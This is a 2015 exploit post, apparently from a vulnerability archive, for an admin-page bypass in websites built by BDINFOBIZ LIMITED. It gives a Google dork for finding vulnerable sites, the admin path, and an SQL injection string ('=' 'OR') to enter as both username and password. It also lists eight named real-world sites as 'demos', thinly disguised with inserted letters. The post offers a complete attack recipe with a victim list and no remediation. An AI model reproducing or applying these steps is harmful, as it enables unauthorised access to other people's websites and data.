BDINFOBIZ LIMITED Bypass Admin Page Vulnerability

2015.07.30
Credit: Ashiyane Digital Security Team
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:\"Developed by BDINFOBIZ LIMITED\"

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Exploit Title : BDINFOBIZ LIMITED Bypass Admin Page Vulnerability [+] Exploit Author : Ashiyane Digital Security Team [+] Vendor Homepage : http://www.bdinfobiz.com/ [+] Date: 2015-07-29 [+] Google Dork : intext:"Developed by BDINFOBIZ LIMITED" [+] Date: [+] Tested On : Windows , Linux [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] And then choose a target and put this after url : /administration/index.php [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] And fill username and password like the information below : [+] Username : '=' 'OR' [+] Password : '=' 'OR' [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Demos : [+] http://skXynews71.com/administration/index.php [+] http://kheXlagharpata.com/administration/index.php [+] http://unicaXmbd.com/administration/index.php [+] http://hi-speXedbd.com/administration/index.php [+] http://rifadeebXtexbd.com/administration/index.php [+] http://fgnXbd.com/administration/index.php [+] http://ghatXakdadu.com/administration/index.php [+] http://sweetXtouchshop.com/administration/index.php [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] SPT : All of the friends in my heart <3 [+] Discovered by : Cloner-47 [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top